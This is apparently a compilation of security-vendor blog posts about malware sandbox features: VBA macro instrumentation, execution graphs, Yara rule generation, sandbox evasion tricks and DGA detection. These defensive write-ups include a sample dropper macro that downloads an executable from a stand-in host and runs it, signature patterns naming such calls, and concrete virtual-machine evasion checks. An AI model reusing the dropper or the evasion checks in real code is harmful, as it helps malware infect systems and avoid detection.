Dynamically Analyze Office Macros by instrumenting VBE

    Introduction

    As you all know, Microsoft Office documents have become a new attack vector. By embedding macro code, attackers can easily deliver exploit or dropper code to victims by e-mail. Since executable attachments such as exe, scr or cpl files are usually blocked, Office documents remain one of the last options. A further obstacle is that macros are often disabled on the victim's host, so the code is not executed directly. To lure the user into enabling macros, various social engineering tricks are used:


    Macros can be analyzed with static analysis very easily. In order to do so one parses the document structure, searches for OLE streams, and then extracts the VBA code:



    Signatures can be used to detect suspicious API calls inside the code:
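
    As a minimal sketch of what such a check can look like (this is not the Joe Sandbox signature format; the signature names, patterns and the sample macro below are made up for illustration), a few regular expressions over the extracted VBA source already flag typical dropper calls:

```python
import re

# Hypothetical signature set: description -> pattern over VBA source text.
SIGNATURES = {
    "downloads a file": re.compile(r"\bURLDownloadToFile[AW]?\b", re.IGNORECASE),
    "spawns a process": re.compile(r"\b(Shell|ShellExecute[AW]?|WScript\.Shell)\b", re.IGNORECASE),
    "runs on open": re.compile(r"\b(Auto_?Open|Document_Open|Workbook_Open)\b", re.IGNORECASE),
}

def match_signatures(vba_source):
    """Return the sorted descriptions of all signatures that hit in the macro source."""
    return sorted(name for name, pattern in SIGNATURES.items() if pattern.search(vba_source))

# Made-up macro used only to exercise the patterns.
SAMPLE_MACRO = '''
Sub AutoOpen()
    URLDownloadToFileA 0, "http://example.invalid/x.exe", Environ("TEMP") & "\\x.exe", 0, 0
    Shell Environ("TEMP") & "\\x.exe", vbHide
End Sub
'''

print(match_signatures(SAMPLE_MACRO))
```

    Such patterns only work while the API names appear literally in the source, which is exactly what obfuscation removes.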




    Writing a static deobfuscator is a dead end

    Such static signatures have been part of Joe Sandbox ever since we first saw malicious Office documents with macro payloads. As you may guess, it did not take long until macro code was no longer easily human readable but obfuscated at the source level:



    Such obfuscations are simple and work well to evade static signatures on the code. In order to get the clean code one may develop deobfuscators. However, this is a dead end. First, it is always reactive: you have to understand the obfuscation technique before you can write a deobfuscator. Second, it is very easy to randomize obfuscations. Finally, it takes time and effort to develop a new deobfuscator. For instance, the following code does not use any Chr based string obfuscation but rather a more complex algorithm (note that all the variables are named after persons):
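
    To make the "reactive" point concrete, here is a minimal sketch of a static deobfuscator that handles exactly one trick, constant Chr(n) chains. The function name and the test strings are our own illustration, not part of any product:

```python
import re

# One or more Chr(n) / Chr$(n) / ChrW(n) calls with literal arguments, joined by & or +.
CHR_CHAIN = re.compile(
    r"Chr[W$]?\(\s*\d+\s*\)(?:\s*[&+]\s*Chr[W$]?\(\s*\d+\s*\))*",
    re.IGNORECASE,
)
CHR_CALL = re.compile(r"Chr[W$]?\(\s*(\d+)\s*\)", re.IGNORECASE)

def fold_chr_chains(vba_source):
    """Replace constant Chr(...) chains with the VBA string literal they build."""
    def fold(match):
        text = "".join(chr(int(code)) for code in CHR_CALL.findall(match.group(0)))
        return '"' + text.replace('"', '""') + '"'  # VBA escapes quotes by doubling them
    return CHR_CHAIN.sub(fold, vba_source)

print(fold_chr_chains("Shell Chr(99) & Chr(109) & Chr(100)"))  # chain is folded
print(fold_chr_chains("Shell Chr(98 + 1) & Chr(109)"))         # arithmetic defeats the pattern
```

    The second call shows the problem: a trivial change such as arithmetic inside the Chr argument is enough to slip past the pattern, and every such variation needs another round of deobfuscator development.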




    Dynamically Analyzing VBA Code by instrumenting VBE

    The solution to the obfuscation problem of VBA code is dynamic analysis. We have successfully instrumented the Visual Basic runtime interpreter in order to track code execution. We already used the same approach to capture JavaScript compilation and DOM modification events in Internet Explorer. This greatly helps to understand obfuscated JavaScript and browser exploits:


    The VBE instrumentation we have added to Joe Sandbox allows us to see live VBA data, for instance string decryption:

     

    Signatures to detect suspicious strings inside decrypted data:



    The cool thing about the VBE instrumentation is that, as long as the VBA code is executed, it lets us see everything, no matter how sophisticated the obfuscation is. In addition, it enables Joe Sandbox to inspect live execution data for malware written in Visual Basic. Many APTs have a crypter or obfuscation stub written in VB.

    Conclusion

    Using pure static analysis to deobfuscate the source code of script languages is a dead end. It costs a lot of time to develop a deobfuscator, while it is super easy to randomize or change the obfuscation in order to evade it. Custom dynamic analysis which instruments the script interpreter core does not care about code obfuscation: it sees everything, including decrypted data. This feature facilitates the malware reverse engineering and analysis process, and makes generic detection more sound.

    Full Analysis Report:



    The Power of Execution Graphs Part 1/3

    Introduction

    We have been quite busy and will soon release Joe Sandbox 12. It is so far one of the biggest releases we have made and includes several new features such as:

    • Execution graphs
    • Yara rule generator (see http://www.yara-generator.net/)
    • MITM SSL proxy to inspect HTTPS (credits to Daniel Roethlisberger)
    • 63 behavior signatures
    • Behavior signatures to detect unpacked / dynamic code
    • More than 10 behavior signatures to detect evasive behavior
    • Score algorithm with lower FP and FN
    • System event logging
    • Slim PCAPs
    • Per process memory and CPU stats
    In this and two follow-up blog posts we are going to outline a new feature called Execution Graphs. 

    Evading sandboxes is a key feature of today’s advanced threats. To do so malware uses various tricks for checking whether it is running on an analysis system, such as trying to detect if the current system is a virtual / emulated machine or checking whether it is being debugged or analyzed. In such cases, the malware will keep a low profile and avoid exhibiting its actual malicious behavior, potentially evading detection by the malware analysis system. The latest threats also implement generic evasion, such as validating user behavior or time and sleep tricks (see the blog posts http://bit.ly/1uZBmN2 and http://bit.ly/1qNT3Bu).

    Since version 7, released in 2012, Joe Sandbox has implemented a variety of techniques to prevent or detect evasive malware. This includes execution on native systems, analysis of non-executed functions through Hybrid Code Analysis (HCA), specific signatures for identifying evasive patterns, as well as cookbooks.

    In recent months we have seen a strong increase in more sophisticated evasion techniques in malware, which are harder to find. Therefore we have decided to make this topic a key part of Joe Security’s research roadmap.

    Execution Graphs

    One of the new features we added to Joe Sandbox 12 is Execution Graphs. Execution Graphs have been designed to automatically spot evasions, but also to help quickly understand how the malware implements the evasion.




    In general an Execution Graph is a highly condensed control flow graph with a focus on API-rich paths. Since it is highly compressed it is easier to understand than a full control flow graph. The graph is composed of nodes representing sections of code, and edges corresponding to the control flow (calls, jumps, etc.) of the malware. Each node is labeled with the set of API calls it executes. Nodes are colored to highlight additional properties:

    • Yellow: the node is a program / thread entry point or a top level function
    • Orange: the code has been triggered during execution
    • Red: the code has been unpacked and executed
    • Grey / blackish: the code has not been executed
    Different shapes are used for highlighting graph locations. The diamond-shaped nodes correspond to so-called key decision nodes, in the sense that the process decides at this node to avoid execution of a branch which could lead to interesting key behavior. Thus key decision nodes are especially relevant when browsing the execution graph for evasive behavior. Note that determining whether a decision node is key depends on the execution status of the nodes reachable through its branches (one branch should lead to executed APIs, the other to different non-executed APIs), thus different executions may lead to different key decision nodes.
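
    The key decision criterion can be sketched in a few lines. This is a simplified model under our own assumptions (a dictionary based graph, hypothetical node names, APIs taken from the demo sample discussed in this post), not the Joe Sandbox implementation:

```python
def reachable_apis(graph, start, executed):
    """APIs of all nodes reachable from `start` whose execution status equals `executed`."""
    seen, stack, apis = set(), [start], set()
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        if graph[node]["executed"] == executed:
            apis |= graph[node]["apis"]
        stack.extend(graph[node]["succ"])
    return apis

def is_key_decision(graph, name):
    """True if one branch leads to executed APIs and another to different non-executed APIs."""
    node = graph[name]
    if not node["executed"] or len(node["succ"]) < 2:
        return False
    for taken in node["succ"]:
        ran = reachable_apis(graph, taken, executed=True)
        for other in node["succ"]:
            if other == taken:
                continue
            missed = reachable_apis(graph, other, executed=False) - ran
            if ran and missed:
                return True
    return False

# Hypothetical miniature graph: a time check that either exits or runs the payload.
GRAPH = {
    "entry":      {"apis": set(),             "executed": True,  "succ": ["check_time"]},
    "check_time": {"apis": {"GetSystemTime"}, "executed": True,  "succ": ["exit", "payload"]},
    "exit":       {"apis": {"ExitProcess"},   "executed": True,  "succ": []},
    "payload":    {"apis": {"GetVersionExA"}, "executed": False, "succ": ["spread"]},
    "spread":     {"apis": {"CopyFileA"},     "executed": False, "succ": []},
}

print([name for name in GRAPH if is_key_decision(GRAPH, name)])
```

    Because the check depends on the execution flags, running the same sample under different conditions can move the key decision nodes, as noted above.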

    The following figure shows the initial part of the execution graph for our demo sample (MD5: 0af4ef5069f47a371a0caf22ae2006a6). 


    Notice how the first few nodes after the entry point (colored yellow) have an orange/red color, while the other nodes are grey/black? Recall that red coloring indicates that the corresponding code has been executed, while black is used for non-executed code.

    When zooming in on the graph's entry node, the following control-flow pattern appears:



    The sample execution graph clearly exhibits a very straightforward evasive behavior: there is a key decision point where the GetSystemTime API is called, followed by another key decision and a call to the ExitProcess API. All these nodes are colored red and were therefore executed, whereas the part of the graph starting at GetVersionExA was not executed (grey and black color). The full execution graph includes a lot of non-executed malicious behavior not shown here. The green edges represent so-called rich paths, which allow the analyst to track the most API-intensive paths of the execution graph, independently of their actual execution status. A path is considered to be "intensive" if it calls many APIs that commonly appear in malicious code. Here the rich path leads to some non-executed part of the graph:
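
    One way to think about a rich path is as the path that collects the most suspicious API calls, regardless of execution status. The sketch below assumes an acyclic graph and a hand-picked list of suspicious APIs; both the list and the node names are hypothetical, and the actual scoring used by Joe Sandbox is not described in this post:

```python
from functools import lru_cache

# Hypothetical list of APIs that often appear in malicious code.
SUSPICIOUS = {"OpenProcess", "WriteProcessMemory", "CreateRemoteThread",
              "GetDriveTypeA", "CopyFileA"}

# Hypothetical acyclic graph: node -> APIs called there and successor nodes.
GRAPH = {
    "entry":  {"apis": {"GetSystemTime"}, "succ": ["exit", "init"]},
    "exit":   {"apis": {"ExitProcess"}, "succ": []},
    "init":   {"apis": {"GetVersionExA"}, "succ": ["inject", "usb"]},
    "inject": {"apis": {"OpenProcess", "WriteProcessMemory", "CreateRemoteThread"}, "succ": []},
    "usb":    {"apis": {"GetDriveTypeA", "CopyFileA"}, "succ": []},
}

def richest_path(graph, start):
    """Return (score, path) for the path from `start` with the most suspicious APIs."""
    @lru_cache(maxsize=None)
    def best(node):
        own = len(graph[node]["apis"] & SUSPICIOUS)
        tail_score, tail = 0, ()
        for successor in graph[node]["succ"]:
            score, path = best(successor)
            if score > tail_score:  # only extend the path where it gains something
                tail_score, tail = score, path
        return own + tail_score, (node,) + tail
    return best(start)

print(richest_path(GRAPH, "entry"))
```

    Note that execution status plays no role in the score, which is why a rich path can point straight into code that never ran.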


    The blue edges represent thread creations, and the yellow nodes are thread entry points. In the given sample each created thread has its own malicious payload:

    • Thread 4098a0: its task is to terminate debugging tools and antivirus software. Function 4095e0 is registered as a callback using the EnumWindows API: it enumerates all top-level windows and checks their titles against strings such as "avast", "avira" or "kaspersky", among many others. If a title matches, the process is killed instantly.

    • Thread 407230 is in charge of persistence and installation behavior.
    • Thread 407180 spreads its main executable to external drives, since it checks for available system drives and uses API call chains often found in USB drive infection routines (GetDriveType, CopyFile, SetFileAttributes).

    • Thread 407a80: parses remote commands. It is the main payload thread which acts as a broker.
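
    Spotting an API call chain such as the USB infection routine above boils down to an ordered subsequence match over the APIs seen in a thread. A minimal sketch, with a made-up trace and a function name of our own choosing:

```python
USB_INFECTION_CHAIN = ("GetDriveType", "CopyFile", "SetFileAttributes")

def contains_chain(api_trace, chain):
    """True if the chain's APIs occur in order (not necessarily adjacent) in the trace.

    Prefix matching lets "CopyFile" match both CopyFileA and CopyFileW.
    """
    remaining = iter(api_trace)
    return all(any(call.startswith(step) for call in remaining) for step in chain)

# Hypothetical API trace of one thread.
TRACE = ["GetLogicalDrives", "GetDriveTypeA", "CreateFileA", "CopyFileA", "SetFileAttributesA"]

print(contains_chain(TRACE, USB_INFECTION_CHAIN))
print(contains_chain(list(reversed(TRACE)), USB_INFECTION_CHAIN))
```

    Sharing one iterator across all steps is what enforces the order: each step can only match calls that come after the previous match.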

    The structure of the graph as well as all additional properties such as execution coverages or decision nodes are directly passed to the signature interface of Joe Sandbox. This makes it possible to write behavior rules which detect evasive behavior.


    We may navigate between the execution graphs and the corresponding assembly code.  In the case of sample MD5 0af4ef5069f47a371a0caf22ae2006a6, we can determine that the current system time returned by GetSystemTime is checked in the code associated with the key decision nodes, and depending on its value the sample decides to exit the process or continue with execution:



    Same for the command handler found in thread 407a80:



    Conclusion

    Execution graphs are a powerful tool for detecting and understanding evasive behavior. Thanks to their form, coloring and node shapes, we can spot evasion patterns very efficiently. Since the graph is reduced and simplified, this also works with very complex and extensive code. The structure of the graph and all attributes are fed to the Joe Sandbox signature interface. Therefore we can easily rate and classify evasive behavior within seconds. Since the graph describes the complete behavior and not just the executed path, any behavior can be rated and classified.

    During development, execution graphs have already proven to be very useful. Therefore we will present some of our detections of more complex behaviors / evasions in two additional blog posts. Stay tuned!

    Example Reports for the sample used in the post:



    Introducing Yara Rule Generator

    A couple of months ago we started to work on a new feature for Joe Sandbox we call Yara Rule Generator. Yara is a well known pattern matching engine built for the purpose of writing simple malware detection rules:

     

    Yara's main use is to detect APTs and advanced threats which AV does not detect that quickly. A large share of Joe Security's customers use Yara on a daily basis. Because of that, we received many requests to add a feature to Joe Sandbox that automatically generates Yara rules, and we finally decided to take up that challenge.

    Today we release a new free service, which you can find at www.yara-generator.net. Yara Rule Generator creates Yara rules automatically based on behavior data such as files and memory captured by Joe Sandbox.


    How does the Joe Sandbox Yara Rule Generator work and what kind of rules does it generate? The generator creates three different rules per submitted sample:



    File rules make it possible to search for the submitted sample. Dropped rules are generated from files which have been created or downloaded by the initial sample during dynamic analysis. Memory opcode rules, finally, are generated from memory dumps. File and dropped rules make it possible to scan for the particular sample on the file system. Memory opcode rules, on the other hand, make it possible to find malware in the process memory of a target system (you can specify a process id as a target when you launch Yara, or use our batch file to scan all processes).

    Further, a rule can be a simple or a super rule. Simple rules are specific to the submitted sample and its behavior. Therefore they do not match variants of the same malware. Super rules are generic and are built over a set of uploaded samples / behavior. Since they only capture common behavior they often find malware variants:



    To generate rules the Joe Sandbox Yara Rule Generator extracts different kinds of behavior data such as:

    • PE structure data (e.g. section names)
    • Strings (unicode and ascii)
    • Code sequences (e.g. entrypoint)
    • Opcode sequences from HCA (Hybrid Code Analysis)
    All the extracted artifacts are then rated based on knowledge, entropy and location information. After artifact selection a test rule is generated and its false positive rate is measured using a reference goodware set. Finally, the rule is kept if the false positive rate is acceptable.
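
    The selection pipeline can be illustrated with a strongly simplified sketch. It only rates string artifacts by Shannon entropy and rejects any string found in a goodware reference set; the threshold, the candidate strings, the goodware blob and the rule name are all hypothetical, and the knowledge and location ratings are left out:

```python
import math
from collections import Counter

def shannon_entropy(text):
    """Bits per character; low values indicate repetitive, unspecific strings."""
    counts = Counter(text)
    return -sum(n / len(text) * math.log2(n / len(text)) for n in counts.values())

def select_strings(candidates, goodware_blobs, min_entropy=2.5, limit=3):
    """Keep specific-looking strings that never occur in the goodware reference set."""
    kept = [s for s in candidates
            if shannon_entropy(s) >= min_entropy
            and not any(s in blob for blob in goodware_blobs)]
    return sorted(kept, key=shannon_entropy, reverse=True)[:limit]

def render_rule(name, strings):
    """Render the selected strings as Yara rule text."""
    lines = ["rule " + name, "{", "    strings:"]
    for index, text in enumerate(strings):
        escaped = text.replace("\\", "\\\\").replace('"', '\\"')
        lines.append('        $s%d = "%s" ascii wide' % (index, escaped))
    lines += ["    condition:", "        all of them", "}"]
    return "\n".join(lines)

# Made-up artifacts and goodware content for illustration only.
CANDIDATES = ["kernel32.dll", "aaaaaaaaaaaa", "Global\\mtx_9f3c1e"]
GOODWARE = ["...LoadLibraryA kernel32.dll GetProcAddress..."]

selected = select_strings(CANDIDATES, GOODWARE)
print(render_rule("hypothetical_sample_file", selected))
```

    Here the repetitive string fails the entropy check and the common DLL name is rejected by the goodware test, so only the mutex-like string ends up in the rule.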

    For super rules Joe Sandbox Yara Rule Generator uses an efficient clustering algorithm to find common opcode sequences.
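
    The clustering algorithm itself is not described here. As a much simpler stand-in that conveys the idea of a super rule, the following sketch intersects fixed-length opcode n-grams across all samples of a set; the mnemonic lists are invented for illustration:

```python
def ngrams(opcodes, n):
    """All contiguous opcode sequences of length n in one sample."""
    return {tuple(opcodes[i:i + n]) for i in range(len(opcodes) - n + 1)}

def common_sequences(samples, n=4):
    """Opcode sequences of length n that occur in every sample of the set."""
    shared = ngrams(samples[0], n)
    for sample in samples[1:]:
        shared &= ngrams(sample, n)
    return shared

# Three hypothetical variants of the same family, as mnemonic lists.
VARIANTS = [
    ["push", "mov", "xor", "call", "test", "jz", "ret"],
    ["nop", "mov", "xor", "call", "test", "jnz", "ret"],
    ["mov", "xor", "call", "test", "pop", "ret"],
]

print(common_sequences(VARIANTS))
```

    Only the sequence shared by all three variants survives, which is the kind of artifact that can also match a fourth, unseen variant.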

    Results look very promising. To test super rules we have generated rules by using malware family sets. We took three samples out of the set and generated super rules. We then infected a test system with a fourth sample of the same family and searched it with our rules:


    Of course also the file and dropped rules work well:


    However, please note that the Yara Rule Generator is no silver bullet. Creating simple and super rules is tricky and far from perfect. During the development of version 1.0.0 we spotted many areas for improvement. All the rules are well commented and documented, so it is simple to extend or change them.

    The Yara Rule Generator has already been deeply integrated into the Joe Sandbox platform and will be shipped with the next major release.

    Happy Rule Creation!

    Update 1:

    We were inspired by yaraGen from Florian Roth as well as https://yaragenerator.com.

    Happy New Year!

          
          The Joe Security team wishes you success, satisfaction and many pleasant moments in 2015!

    New Sandbox Evasion Tricks spotted with Joe Sandbox 10.5

    Recently we came across an interesting sample equipped with new tricks to evade sandboxes and other dynamic analysis systems:


    In pseudo code:


    The sample sleeps until there is both a mouse and a foreground window change. Since most malware analysis systems only simulate mouse changes, they fail to analyze the real malicious payload. With the Cookbook technology of Joe Security one can easily simulate any activities:
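
    The logic of this trick can be modeled without touching any Windows API. In the sketch below the three callables are hypothetical stand-ins for whatever the sample uses to read the cursor position, read the foreground window and sleep; the simulated environment is ours as well:

```python
def wait_for_user(get_cursor, get_foreground, sleep, max_polls=1000):
    """Poll until BOTH the cursor position and the foreground window have changed.

    Returns the number of polls needed, or None if the condition never held.
    """
    start_cursor, start_window = get_cursor(), get_foreground()
    for polls in range(1, max_polls + 1):
        sleep(1)
        if get_cursor() != start_cursor and get_foreground() != start_window:
            return polls
    return None  # the payload is never reached

def make_environment(moves_mouse, switches_windows):
    """Simulated analysis system; time only advances when the sample sleeps."""
    state = {"ticks": 0}

    def sleep(_seconds):
        state["ticks"] += 1

    def cursor():
        return (state["ticks"], 0) if moves_mouse else (0, 0)

    def foreground():
        return "hwnd-%d" % (state["ticks"] // 3) if switches_windows else "hwnd-0"

    return cursor, foreground, sleep

print(wait_for_user(*make_environment(True, False), max_polls=50))  # mouse simulation only
print(wait_for_user(*make_environment(True, True), max_polls=50))   # mouse and window changes
```

    A system that only moves the mouse never satisfies the combined condition, while one that also switches the foreground window releases the sample after a few polls.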


    However this is not enough. The sample includes an additional evasion trick:



    Basically, the disk is queried using IOCTL_DISK_GET_DRIVE_GEOMETRY_EX. The returned structure contains information such as the media type, the sectors per track and the number of cylinders of the hard disk. After the query, the number of cylinders is compared to the value 5000. If there are fewer than 5000 cylinders, the sample simply terminates. Since Joe Sandbox runs on any device, including virtual, simulated and native systems, one can quickly analyze the malware on a real system:
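
    To see what the threshold means in practice, the following sketch packs and parses the leading fields of a DISK_GEOMETRY_EX buffer and applies the same comparison. It assumes the commonly reported geometry of 255 tracks per cylinder, 63 sectors per track and 512 bytes per sector; the helper names and disk sizes are ours:

```python
import struct

# Leading fields of DISK_GEOMETRY_EX: Cylinders (64 bit), MediaType,
# TracksPerCylinder, SectorsPerTrack, BytesPerSector (32 bit each), DiskSize (64 bit).
GEOMETRY_EX = struct.Struct("<qIIIIq")
FIXED_MEDIA = 12  # MEDIA_TYPE value for a fixed hard disk

def fake_geometry(disk_bytes, tracks=255, sectors=63, bytes_per_sector=512):
    """Build the buffer a disk of this size would report (assumed typical geometry)."""
    cylinders = disk_bytes // (tracks * sectors * bytes_per_sector)
    return GEOMETRY_EX.pack(cylinders, FIXED_MEDIA, tracks, sectors, bytes_per_sector, disk_bytes)

def cylinders_from_buffer(buffer):
    """Read the cylinder count from the start of the buffer."""
    return GEOMETRY_EX.unpack_from(buffer)[0]

def sample_would_exit(buffer, threshold=5000):
    """Mirror the check described above: fewer cylinders than the threshold means exit."""
    return cylinders_from_buffer(buffer) < threshold

small_vm_disk = fake_geometry(20 * 1024**3)  # 20 GiB virtual disk
physical_disk = fake_geometry(500 * 10**9)   # 500 GB physical disk

print(cylinders_from_buffer(small_vm_disk), sample_would_exit(small_vm_disk))
print(cylinders_from_buffer(physical_disk), sample_would_exit(physical_disk))
print(5000 * 255 * 63 * 512)  # disk size in bytes at exactly 5000 cylinders
```

    Under that geometry, 5000 cylinders correspond to roughly 41 GB, so analysis machines with small virtual disks fall below the threshold while typical physical disks do not.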





    Finding a DGA in less than one Minute

    Recently, we stumbled upon a malware sample (MD5: 177b75910ae8c0091bafef4950c0b224) that obviously employs a domain generation algorithm (DGA). We analyzed the sample with Joe Sandbox 10.5 which will be released soon.

    As the signature overview highlights, Joe Sandbox has detected that the malware generates random DNS queries:
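
    How Joe Sandbox rates DNS queries as random is not described in this post. A rough heuristic in the same spirit, assuming a per-process list of queried names, is to require several distinct names whose leftmost labels have a high average character entropy; the thresholds and the domain names below are made up:

```python
import math
from collections import Counter

def entropy(label):
    """Shannon entropy of a label in bits per character."""
    counts = Counter(label)
    return -sum(n / len(label) * math.log2(n / len(label)) for n in counts.values())

def looks_like_dga(queried_names, min_unique=3, min_mean_entropy=3.0):
    """Flag a set of DNS queries whose leftmost labels look random on average."""
    labels = {name.lower().split(".")[0] for name in queried_names}
    if len(labels) < min_unique:
        return False
    mean_entropy = sum(entropy(label) for label in labels) / len(labels)
    return mean_entropy >= min_mean_entropy

# Made-up query lists under reserved top-level domains.
GENERATED = ["xkqzvbtwplrm.example", "hjdnfgcyswqe.example", "mzptrkvlxbqw.example"]
ORDINARY = ["www.example.com", "mail.example.com", "update.example.com"]

print(looks_like_dga(GENERATED))
print(looks_like_dga(ORDINARY))
```

    Entropy of a single name is a weak signal, since long legitimate names can score high as well, which is why the sketch looks at the average over many distinct queries.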


    Massive injections and system behavior have been detected as well:


    Also the network behavior is quite extensive:



    One of the cool new features of Joe Sandbox 10 is a context based search integrated into the behavior analysis reports. With it you can search any data Joe Sandbox has captured:


    In order to find the DGA, search for the term "DNSQuery":



    It seems explorer.exe is doing some DNS queries. Clicking on the search hits lets one navigate easily to the corresponding data:


    As the excerpt shows, DnsQuery_A has been called 244 times, which matches the extensive network behavior. By clicking on the source address one can jump to the function where this DnsQuery API has been called:


    The instructions before the DnsQuery API call show that the domain name is generated by the function 12AE200. With the help of the IDA Bridge plugin, one can load memory dumps extracted by Joe Sandbox easily:


    And pull in dynamic behavior data:


    Full Analysis Report available at (use Firefox to open it):



    Analysis of Code4HK with Joe Sandbox Mobile

    As the media and several tech companies have already reported, a fake smartphone app is being used to remotely monitor pro-democracy protesters in Hong Kong. We came across the corresponding malware via our APK Analyzer (www.apk-analyzer.net):


    A full analysis can be downloaded here:

    The Joe Sandbox Mobile analysis is very nice and shows all spying and control payloads of the trojan. Rather than explaining all details, we just add some interesting report excerpts here: